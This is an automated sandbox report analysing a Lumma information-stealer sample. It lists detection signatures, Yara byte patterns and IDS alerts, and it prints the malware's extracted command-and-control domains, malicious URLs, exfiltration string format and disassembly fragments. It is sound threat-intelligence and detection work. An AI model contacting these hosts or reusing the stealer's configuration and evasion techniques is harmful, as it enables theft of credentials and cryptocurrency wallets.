Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DG55Gu1yGM.exe

Overview

General Information

Sample name:DG55Gu1yGM.exe
renamed because original name is a hash value
Original sample name:f5f01c71d9ad196656cdceef7c1f12e6.exe
Analysis ID:1576510
MD5:f5f01c71d9ad196656cdceef7c1f12e6
SHA1:962510bfb783205e77952ba732d64ef893270c54
SHA256:2dda3c98fdc0a1a6cfeb495975c4ef006342388e1e9bcbbd2f11d323ac443090
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DG55Gu1yGM.exe (PID: 4724 cmdline: "C:\Users\user\Desktop\DG55Gu1yGM.exe" MD5: F5F01C71D9AD196656CDCEEF7C1F12E6)
    • 8BB0.tmp.exe (PID: 5064 cmdline: "C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe" MD5: 2C0A5976C7D6D86506EB825C8D67A8B8)
      • WerFault.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1636 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["immureprech.biz", "sordid-snaked.cyou", "debonairnukk.xyz", "deafeninggeh.biz", "awake-weaves.cyou", "effecterectz.xyz", "diffuculttan.xyz", "wrathful-jammy.cyou"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1268:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        2.2.8BB0.tmp.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          2.3.8BB0.tmp.exe.2500000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            2.3.8BB0.tmp.exe.2500000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              2.2.8BB0.tmp.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:49.777440+010020283713Unknown Traffic192.168.2.549706104.131.68.180443TCP
                2024-12-17T08:18:52.338976+010020283713Unknown Traffic192.168.2.54970845.77.249.79443TCP
                2024-12-17T08:18:56.178703+010020283713Unknown Traffic192.168.2.549715104.121.10.34443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:50.284154+010020546531A Network Trojan was detected192.168.2.549706104.131.68.180443TCP
                2024-12-17T08:18:53.290018+010020546531A Network Trojan was detected192.168.2.54970845.77.249.79443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:50.284154+010020498361A Network Trojan was detected192.168.2.549706104.131.68.180443TCP
                2024-12-17T08:18:53.290018+010020498361A Network Trojan was detected192.168.2.54970845.77.249.79443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:52.338976+010020582151Domain Observed Used for C2 Detected192.168.2.54970845.77.249.79443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:49.777440+010020582231Domain Observed Used for C2 Detected192.168.2.549706104.131.68.180443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:54.274547+010020582101Domain Observed Used for C2 Detected192.168.2.5557251.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:50.289403+010020582141Domain Observed Used for C2 Detected192.168.2.5497021.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:53.742917+010020582161Domain Observed Used for C2 Detected192.168.2.5514541.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:53.516770+010020582181Domain Observed Used for C2 Detected192.168.2.5609571.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:53.291662+010020582201Domain Observed Used for C2 Detected192.168.2.5517811.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:48.315792+010020582221Domain Observed Used for C2 Detected192.168.2.5634781.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:48.082321+010020582261Domain Observed Used for C2 Detected192.168.2.5619161.1.1.153UDP
                2024-12-17T08:18:54.498503+010020582261Domain Observed Used for C2 Detected192.168.2.5652261.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:54.053892+010020582361Domain Observed Used for C2 Detected192.168.2.5620731.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:42.268418+010028032742Potentially Bad Traffic192.168.2.549704104.21.56.70443TCP
                2024-12-17T08:18:43.839039+010028032742Potentially Bad Traffic192.168.2.549705176.113.115.1980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:49.781276+010028225211Domain Observed Used for C2 Detected104.131.68.180443192.168.2.549706TCP
                2024-12-17T08:18:52.350433+010028225211Domain Observed Used for C2 Detected45.77.249.79443192.168.2.549708TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:18:56.932913+010028586661Domain Observed Used for C2 Detected192.168.2.549715104.121.10.34443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: DG55Gu1yGM.exeAvira: detected
                Source: https://debonairnukk.xyz/apixAvira URL Cloud: Label: malware
                Source: https://wrathful-jammy.cyou/api0Avira URL Cloud: Label: malware
                Source: https://sordid-snaked.cyou/Avira URL Cloud: Label: malware
                Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEkAvira URL Cloud: Label: malware
                Source: https://immureprech.biz/apiRAvira URL Cloud: Label: malware
                Source: https://wrathful-jammy.cyou/HAvira URL Cloud: Label: malware
                Source: https://sordid-snaked.cyou/api9Avira URL Cloud: Label: malware
                Source: https://diffuculttan.xyz/api5Avira URL Cloud: Label: malware
                Source: 2.2.8BB0.tmp.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["immureprech.biz", "sordid-snaked.cyou", "debonairnukk.xyz", "deafeninggeh.biz", "awake-weaves.cyou", "effecterectz.xyz", "diffuculttan.xyz", "wrathful-jammy.cyou"], "Build id": "4h5VfH--"}
                Source: DG55Gu1yGM.exeVirustotal: Detection: 43%Perma Link
                Source: DG55Gu1yGM.exeReversingLabs: Detection: 42%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeJoe Sandbox ML: detected
                Source: DG55Gu1yGM.exeJoe Sandbox ML: detected
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: awake-weaves.cyou
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: wrathful-jammy.cyou
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: debonairnukk.xyz
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: diffuculttan.xyz
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: effecterectz.xyz
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: deafeninggeh.biz
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: immureprech.biz
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Screen Resoluton:
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: Workgroup: -
                Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: 4h5VfH--

                Compliance

                barindex
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeUnpacked PE file: 0.2.DG55Gu1yGM.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeUnpacked PE file: 2.2.8BB0.tmp.exe.400000.0.unpack
                Source: DG55Gu1yGM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02158C59 FindFirstFileExW,0_2_02158C59
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h2_2_0043CD60
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp al, 2Eh2_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp eax2_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h2_2_0043B05D
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]2_2_0043B05D
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h2_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]2_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]2_2_0040E83B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h2_2_0043B05B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]2_2_0043B05B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov edx, ecx2_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]2_2_0040C917
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp ecx2_2_0043C1F0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h2_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ecx, di2_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]2_2_0043B195
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]2_2_0043B9A1
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh2_2_004369A0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]2_2_0041E9B0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_004299B0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]2_2_0042526A
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ebx, edi2_2_0041D270
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov esi, eax2_2_00423A34
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h2_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]2_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp ecx2_2_0043C280
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]2_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [eax], dx2_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0043AAB2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h2_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h2_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov eax, ebx2_2_0041CB05
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h2_2_0043CB20
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov edx, eax2_2_00427326
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]2_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0042A3D0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0042C45C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]2_2_00436C00
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]2_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]2_2_00418578
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov edx, eax2_2_0042750D
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_00421D10
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]2_2_0040DD25
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, edx2_2_0040BDC9
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]2_2_00417582
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]2_2_00427DA2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h2_2_004205B0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042C64A
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0042AE48
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp eax2_2_00426E50
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]2_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0042AE24
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00433630
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042C6E4
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]2_2_00425E90
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h2_2_0043CE90
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004166A0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041BEA0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0042ADF4
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov eax, edx2_2_0041C6BB
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp eax2_2_0043BF40
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]2_2_00415F66
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch2_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh2_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh2_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h2_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h2_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h2_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh2_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h2_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]2_2_0043A777
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]2_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]2_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]2_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042C726
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042C735
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0040CFF3
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]2_2_0040CFF3
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al2_2_0041DF80
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]2_2_0040D7A2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]2_2_0040D7A2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_024BD25A
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]2_2_024BD25A
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp eax2_2_024EC268
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h2_2_024EB2CF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]2_2_024EB2CF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h2_2_024EB2C4
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]2_2_024EB2C4
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h2_2_024EB2C2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]2_2_024EB2C2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]2_2_024EB3FC
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp al, 2Eh2_2_024D63B6
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, edx2_2_024BC030
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp eax2_2_024D70E4
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h2_2_024ED0F7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]2_2_024D60F7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024DB08B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024DB0AF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024DB05B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al2_2_024CE1E7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_024DA637
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024DC6C3
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]2_2_024DB763
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024DB763
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp eax2_2_024D6739
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]2_2_024C87DF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]2_2_024C77E9
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then jmp ecx2_2_024EC79B
